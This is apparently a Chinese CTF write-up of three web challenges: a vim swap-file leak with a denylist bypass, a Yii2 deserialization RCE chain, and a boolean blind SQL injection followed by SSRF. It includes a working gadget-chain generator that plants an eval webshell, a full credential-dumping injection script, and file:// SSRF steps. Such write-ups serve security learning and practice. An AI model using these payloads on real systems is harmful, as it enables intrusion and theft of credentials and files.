Web
find_it
dirsearch扫到个robots.txt,里面放着1ndexx.php
直接访问 1ndexx.php 没有任何输出,但编辑器遗留的 vim 交换文件 .1ndexx.php.swp 仍留在网站目录下且可以直接下载(用 vim -r 或 strings 即可从中恢复源码)
拿到源码
<?php
#Really easy...
# Source recovered from the leaked vim swap file (.1ndexx.php.swp). This is the
# actual target: whatever arrives in ?code= is written verbatim into the
# web-reachable hack.php (an arbitrary PHP file write), followed by the raw
# contents of flag.php.
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
# Opened with "w" BEFORE any validation below: hack.php is truncated on every
# request, including the ones that are rejected by the filter or length check.
$hack=fopen("hack.php","w") or die("Unable 2 open");
# No isset(): a request without ?code= only raises a notice and still reaches
# the writes below with an empty payload.
$a=$_GET['code'];
# Keyword denylist, case-sensitive (no /i flag). Being a blacklist, anything not
# listed passes -- e.g. "phpinfo" contains none of these tokens. "replace" is
# listed twice; "~", "^" and backtick block the usual operator-based obfuscation.
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
# Byte-wise length cap (strlen). "<?php phpinfo();" is 16 bytes, well under it.
if(strlen($a)>33){
die("nonono.");
}
# Attacker-controlled bytes first, then flag.php appended into the same file.
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
payload
http://eci-2zegg15ya7y4this8qz2.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();
(URL 解码后 code=<?php phpinfo();,共 16 字节,不含黑名单中的任何关键字。注意源码取自 1ndexx.php,若 index.php 不走这段逻辑,应改为 1ndexx.php?code=... )
访问 hack.php 即执行刚写入的 phpinfo(),flag 在其输出的 Environment(环境变量)部分
framework
Yii2 反序列化 RCE:源码可从 www.zip 下载,先据此核对各 gadget 类的属性名与可见性,再把公开的 Yii2 反序列化链(BatchQueryResult → Faker\Generator → CreateAction)改一下即可。注意 checkAccess='assert' 依赖 assert() 对字符串求值,该行为在 PHP 8 中已移除,目标需为 PHP 7.x 且 zend.assertions 未被 php.ini 关闭(需确认)
<?php
namespace yii\rest{
    // Stand-in for Yii2's yii\rest\CreateAction. Only the two properties the
    // chain needs are declared; their names, visibility (public) and order
    // must match the real class, because serialize() encodes exactly those.
    // The chain sets checkAccess to 'assert' and id to PHP source, so
    // presumably the real run() ends up calling checkAccess with id as its
    // argument -- verify against the CreateAction shipped in www.zip.
    // NOTE(review): assert() evaluating a string is PHP 7-only (removed in
    // 8.0) and needs zend.assertions enabled on the target.
    class CreateAction{
        // Callable the real class invokes; 'assert' turns $id into code.
        public $checkAccess = 'assert';
        // PHP source handed to assert(). The outer quotes are single, so "\$"
        // survives as two characters here and is only reduced to "$" when
        // assert() evaluates the inner double-quoted string; the written
        // shell.php therefore contains a literal $_POST[pass].
        public $id = 'file_put_contents("shell.php","<?php eval(\$_POST[pass]);");';
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    // Stand-in for Faker\Generator. Its protected $formatters map is what the
    // real class consults when an undefined method (here close()) is called
    // on it -- presumably via __call() -> format() -> call_user_func_array()
    // in the bundled Faker version; verify in www.zip. The 'close' key is
    // chosen to match the method BatchQueryResult calls on its reader.
    class Generator{
        // protected: serialize() emits the key as "\0*\0formatters", so the
        // visibility must match the real class or the property is ignored.
        protected $formatters;
        public function __construct(){
            $this->formatters = ['close' => [new CreateAction(), 'run']];
        }
    }
}
namespace yii\db{
    // Stand-in for yii\db\BatchQueryResult, the chain's entry point: the
    // class whose __destruct() runs once the target unserialize()s the blob.
    // Presumably that destructor closes $_dataReader, which is why the
    // property holds the Faker\Generator gadget -- verify in www.zip.
    class BatchQueryResult{
        // private: serialized as "\0yii\db\BatchQueryResult\0_dataReader",
        // so both name and visibility must match the real class exactly.
        private $_dataReader;
        public function __construct(){
            $this->_dataReader = new \Faker\Generator();
        }
    }
}
namespace{
    // Build the chain and print it base64-encoded, without a trailing newline
    // so it can be pasted as-is. The writeup does not show where the target
    // calls unserialize(); that entry point has to be located in www.zip.
    $chain = new yii\db\BatchQueryResult();
    print base64_encode(serialize($chain));
}
?>
用蚁剑连接 http://eci-2ze3l5mg59msjyj8xpg5.cloudeci1.ichunqiu.com/shell.php(连接密码为 pass,对应 payload 中的 $_POST[pass])
再用蚁剑的 bypass disable_function 插件绕过 disable_functions 限制执行命令
WebsiteManger
image.php?id=3 处存在 SQL 注入(布尔盲注:页面不回显查询结果,但条件真/假时响应长度不同)。手测 image.php?id=3/**/or/**/1=1 可用,空格需用 /**/ 代替(空格似乎被过滤)
盲注脚本(以响应长度作为真/假判定,逐字符二分)
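import requests

# Boolean-based blind injection against image.php?id=3. Spaces are written as
# /**/ because the target appears to filter whitespace. Truth is judged by the
# response length alone: a "true" page (id=3 or 1=1) was 50811 bytes on this
# instance. The constant is target-specific -- re-measure it against a known
# true request before reuse, and note that any dynamic content on the page
# (timestamps, counters) breaks this oracle.
url = 'http://eci-2ze56uon9iidfu8xxa70.cloudeci1.ichunqiu.com/image.php?id=3/**/or/**/1='

TRUE_PAGE_LEN = 50811
# Inner query whose result is extracted one character at a time. The two
# commented alternatives enumerate tables / columns; swap them in as needed.
CONTENT = "select/**/group_concat(username,':',password)/**/from/**/users"
# CONTENT = "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
# CONTENT = "select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'"
MAX_LEN = 200      # upper bound on extracted characters (1-based positions 1..199)
TIMEOUT = 10       # seconds; without it a stalled target hangs the whole loop


def _is_true(sql):
    """Send one probe and report whether the injected condition held.

    The page is "true" when its body length equals TRUE_PAGE_LEN; anything
    else (false page, error page, timeout response) counts as false.
    """
    r = requests.get(url + sql, timeout=TIMEOUT)
    return len(r.content) == TRUE_PAGE_LEN


def _extract_char(pos):
    """Binary-search the ASCII code of character `pos` (1-based) of CONTENT.

    Returns the code point, or 31 when `pos` is past the end of the string
    (MySQL's ascii(substr(...)) is 0 there, which sorts below 32). Bytes
    >= 128 (multi-byte data) are clamped to 127 by the search range.
    """
    low, high = 32, 128
    while low < high:
        mid = (low + high) // 2
        # "ascii < mid" true  -> answer in [low-1, mid-1]; else in [mid, high-1]
        if _is_true(f"if(ascii(substr(({CONTENT}),{pos},1))<{mid},1,2)"):
            high = mid
        else:
            low = mid + 1
    # Invariant leaves the answer at low-1 once the range collapses.
    return low - 1


def main():
    """Dump CONTENT character by character, printing progress after each one.

    Stops at the first position that yields no character or at MAX_LEN.
    """
    result = ""
    for pos in range(1, MAX_LEN):
        code = _extract_char(pos)
        if code < 32:
            # Past the end of the string: nothing printable left to fetch.
            print(result)
            break
        result += chr(code)
        print(result)
    # recovered on this target: admin:1288a7689e3c735652a72


if __name__ == '__main__':
    main()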
用上面得到的凭据登录后台后,有一个调用 curl 的功能(SSRF),让它请求 file:// 协议的 URL 即可读取服务器本地文件,从而拿到 flag